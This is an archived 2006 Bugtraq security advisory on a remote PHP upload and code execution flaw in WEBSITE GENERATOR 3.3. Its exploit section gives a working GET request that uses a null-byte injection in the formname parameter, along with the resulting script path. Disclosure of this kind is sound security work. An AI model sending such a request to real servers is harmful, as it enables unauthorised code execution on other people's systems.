[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

NSA Group Security Advisory NSAG-№202-25.02.2006 Vulnerability WEBSITE GENERATOR 3.3

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: NSA Group Security Advisory NSAG-№202-25.02.2006 Vulnerability WEBSITE GENERATOR 3.3
From: NSA Group <vulnerability@xxxxxxx>
Date: Sat, 25 Feb 2006 16:14:24 +0300

Advisory:
NSAG-№202-25.02.2006

Research:
NSA Group [Russian company on Audit of safety & Network security]

Site of Research:
http://www.nsag.ru or http://www.nsag.org

Product:
WEBSITE GENERATOR 3.3


Site of manufacturer:
http://freehostshop.com

The status: 
19/11/2005 - Publication is postponed.
19/11/2005 - Manufacturer is not notified (there is no communication).
17/02/2006 - Publication of vulnerability.

Original Advisory:
http://www.nsag.ru/vuln/894.html

Risk: 
Hide

Description: 
The removed user, can upload php script from other server and execute
custom php code on webserver.


Exploit: 
Method GET:
http://example.com/files/myforms/process3.php?formname=attack.php%00*name[0]=
Link:
http://example.com/files/myforms/forms/attack.php

More information:
http://www.nsag.ru/vuln/894.html

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


www.nsag.ru 
«Nemesis» © 2006 
------------------------------------ 
Nemesis Security Audit Group © 2006.

Prev by Date: Advisory: eZ publish <= 3.7.3 (imagecatalogue module) XSS vulnerability
Next by Date: [FLSA-2006:138098] Updated nfs-utils package fixes security issues
Previous by thread: Advisory: eZ publish <= 3.7.3 (imagecatalogue module) XSS vulnerability
Next by thread: [FLSA-2006:138098] Updated nfs-utils package fixes security issues
Index(es):
- Date
- Thread